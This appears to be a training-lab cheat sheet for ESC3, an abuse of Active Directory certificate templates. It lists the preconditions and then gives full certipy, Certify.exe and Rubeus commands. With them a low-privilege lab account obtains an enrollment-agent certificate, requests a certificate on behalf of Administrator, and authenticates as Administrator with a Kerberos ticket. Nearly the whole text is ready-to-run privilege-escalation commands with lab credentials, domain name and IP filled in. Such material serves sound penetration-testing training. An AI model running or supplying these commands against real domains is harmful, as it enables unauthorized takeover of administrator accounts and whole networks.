ESC3 abuses a template that issues Certificate Request Agent certificates. We enroll for the agent certificate, then use it to request a certificate on behalf of another principal.
Conditions
Requester can enroll in the agent template.
Agent template has Certificate Request Agent EKU.
Manager approval is not required.
Authorized signatures required is 0.
A target template exists that allows enrollment-agent requests and supports authentication.
Find ESC3
certipy find -u 'student@ootw.local' -p 'student' -dc-ip 10.10.10.200 -vulnerable -enabled -stdout
Request agent certificate
certipy req -u 'student@ootw.local' -p 'student' -dc-ip 10.10.10.200 -ca 'OOTW-CA' -template ESC3 -out agent
Request certificate on behalf of Administrator
certipy req -u 'student@ootw.local' -p 'student' -dc-ip 10.10.10.200 -ca 'OOTW-CA' -template User -on-behalf-of 'OOTW\Administrator' -pfx agent.pfx -out administrator
Authenticate
certipy auth -pfx administrator.pfx -domain ootw.local -dc-ip 10.10.10.200
export KRB5CCNAME=administrator.ccache
klist
Windows with Certify
$AgentPfxB64 = "AGENT_PFX_B64"
$AdminCertB64 = "ADMIN_CERT_B64"
Certify.exe request --ca "dc01.ootw.local\OOTW-CA" --template ESC3 --quiet
Certify.exe request-agent --ca "dc01.ootw.local\OOTW-CA" --template User --target Administrator --agent-pfx $AgentPfxB64 --quiet
Rubeus.exe asktgt /user:Administrator /domain:ootw.local /certificate:$AdminCertB64 /ptt
Notes
The first certificate represents the request agent. The second certificate represents the target user. The target certificate is the one used for authentication.